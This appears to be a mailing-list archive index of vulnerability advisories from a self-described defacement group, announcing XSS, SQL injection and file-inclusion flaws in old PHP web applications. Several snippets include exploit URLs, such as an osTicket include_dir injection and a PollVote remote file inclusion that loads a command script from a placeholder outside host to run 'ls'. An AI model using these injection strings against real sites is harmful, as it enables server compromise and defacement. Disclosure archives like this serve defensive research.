IP.Board 3.4 cross-site scripting in Referer header

2014-07-17 Thread stormhacker
.: XSS + Risk ..: high + Found by ..: Ahmed atif abdou [ OCERT Ambassador Program - Oman National CERT ] + Facebook .: https://www.facebook.com/runvirus + Contact ...: stormhacker[at]hotmail[.]com

New post Topic Hijacking XSS All vBulletin v 3.x.x (2)

2007-06-20 Thread stormhacker
.: XSS + Risk ..: Low + Found by ..: rUnViRuS + Original advisory .: http://www.sec-area.com/ + Contact ...: stormhacker[at]hotmail[.]com + Vulnerable Script..: showthread.php + New Include Redirect Bug

New Include Redirect Bug XSS All vBulletin v 3.x.x

2007-06-20 Thread stormhacker
.: XSS + Risk ..: Low + Found by ..: rUnViRuS + Original advisory .: http://www.sec-area.com/ + Contact ...: stormhacker[at]hotmail[.]com + + New Include Redirect Bug XSS All vBulletin v 3.x.x

vSupport Integrated Ticket System 3.*.* SQL injection

2007-06-09 Thread stormhacker
advisory .: http://www.sec-area.com/ + Contact ...: stormhacker[at]hotmail[.]com + + + PoC: + + Database error SQL + // do not limit

Satel Lite for PhpNuke (Satellite.php) = Local File Inclusion

2007-03-26 Thread stormhacker
+ Risk ..: high (LoCal File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com + + + PoC: + +http

Wap Portal Serve 1.* = Remote File Inclusion

2007-02-05 Thread stormhacker
.: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Easy Banner Pro Version 2.8 = Remote File Inclusion

2007-01-09 Thread stormhacker
://www.phpwebscripts.com/ + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

TOPSTORY BASIC Version 1.0 = Remote File Include Vulnerability

2006-11-13 Thread stormhacker
# TOPSTORY BASIC Version 1.0 = Remote File Include Vulnerability # Script.. :TOPSTORY # Discovered By : rUnViRuS # Class.. : Remote # Original Advisory : http://sec-area.com # # file :- index.php # bug Code :- include($tst[headerfile]);

WDT:- osTicket File Include all V

2006-10-14 Thread stormhacker
script:- osTicket Open Source Support Ticket System site:- http://www.osticket.com exploit by runvirus http://www.host/path/include/open_form.php?include_dir= welcome in www.sec-area.com

net2ftp: a web based FTP client :) = Remote File Inclusion

2006-09-27 Thread stormhacker
://www.net2ftp.com + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev Links Directory 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
://www.comdevweb.com + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev Photo Gallery 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
://www.comdevweb.com + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev Customer Helpdesk 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
://www.comdevweb.com + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev News Publisher 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
://www.comdevweb.com + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev Contact Form 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
://www.comdevweb.com + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev Web Blogger 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
://www.comdevweb.com + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev Vote Caster 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
://www.comdevweb.com + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev eCommerce 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
+ Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev CSV Importer 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
://www.comdevweb.com + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev Guestbook 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
+ Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev FAQ Support 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
://www.comdevweb.com + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev Newsletter 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
+ Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

PHPSelect Web Development Division = Remote File Inclusion

2006-09-27 Thread stormhacker
...: http://www.phpselect.com/ + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

Comdev Events Calendar 3.1 :) = Remote File Inclusion

2006-09-27 Thread stormhacker
://www.comdevweb.com + Class .: Remote File Inclusion + Risk ..: high (Remote File Execution) + Found by ..: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...: stormhacker[at]hotmail[.]com

WD25:- Deparcq Pieter project File Include Vulnerability

2006-09-26 Thread stormhacker
[W]orld [D]efacers Team Summary eVuln ID: WD26 Vendor: Deparcq Pieter project Dook:- Copyright © 2004 by Deparcq Pieter Dries Van Thourhout Software: Live Customer Support Solution :- http://www.davidsfonds-roeselare.be/ Class: Remote

SimpleBoard Mambo Component 1.1.0 Remote File Include

2006-09-11 Thread stormhacker
[W]orld [D]efacers Team == Summary eVuln ID: WD23 Vendor: SimpleBoard Mambo Component 1.1.0 Vendor's Web Site: mamboxchange.com/projects/simpleboard Class: Remote PoC/Exploit: Available Solution: Not Available

WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit

2006-09-06 Thread stormhacker
[W]orld [D]efacers Team Summary eVuln ID: WD23 Vendor: phpopenchat-3.0.* Vendor's Web Site: http://phpopenchat.org Class: Remote PoC/Exploit: Available Solution: Not Available Discovered by: rUnViRuS ( wdzone.net worlddefacers.de )

CuteNews 1.3.* Remote File Include Vulnerability

2006-08-25 Thread stormhacker
Welcome people In World Defacers Team [W]orld [D]efacers Team == Summary eVuln ID: WD22 Vendor: CuteNews 1.3.* Vendor's Web Site: http://cutephp.com/ Software: Live Customer Support Solution :-

MKPortal 1.0.1 Final ($ind) File Include Vulnerability (perl)

2006-06-28 Thread stormhacker
Welcome people In World Defacers Team [W]orld [D]efacers Team == Summary eVuln ID: WD21 Vendor: MKPortal 1.0.1 Final Vendor's Web Site: wttp://www.kaimanweb.net Software: Live Customer Support Solution :-

Re: PHP Live Helper =([abs_path]) Remote File Include Vulnerabilities

2006-06-19 Thread stormhacker
Hey look this http://www.securityfocus.com/archive/1/428976 i found this bugs in Mar 27 2006 http://www.worlddefacers.de/Public/WD-TMPLH.txt

SimpleBBS v1.1(posts.php) remote command execution

2006-04-13 Thread stormhacker
[W]orld [D]efacers Team == Summary eVuln ID: WD10 Vendor: SimpleBBS Vendor's Web Site: www.simplemedia.org Software: SimpleBBS Forums Sowtware's Web Site: www.simplemedia.org Versions: v1.1 v 1.0.* Class: Remote PoC/Exploit:

PHPLiveHelper 1.8 remote command execution (include) Xploit (perl)

2006-03-27 Thread stormhacker
[W]orld [D]efacers Team == Summary eVuln ID: WD00 Vendor: phplivehelper Vendor's Web Site: www.phplivehelper.com Software: Live Customer Support Solution Sowtware's Web Site:

bttlxeForum 2.* XSS Vulnerability

2006-02-28 Thread stormhacker
Summary Software: bttlxeForum Sowtware's Web Site: http://www.bttlxe.com/ Versions: 2.* Type: Cross-Site Scripting Class: Remote Exploit: Available Solution: Not Available Discovered by: runvirus (worlddefacers.de securitycentra.com)

PollVote Remote File Inclusion

2005-11-14 Thread stormhacker
Title: PollVote Remote File Inclusion http://www.worlddefacers.net Vulnerability Discovery: rUnViRuS -- exploit :- http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?cmd=ls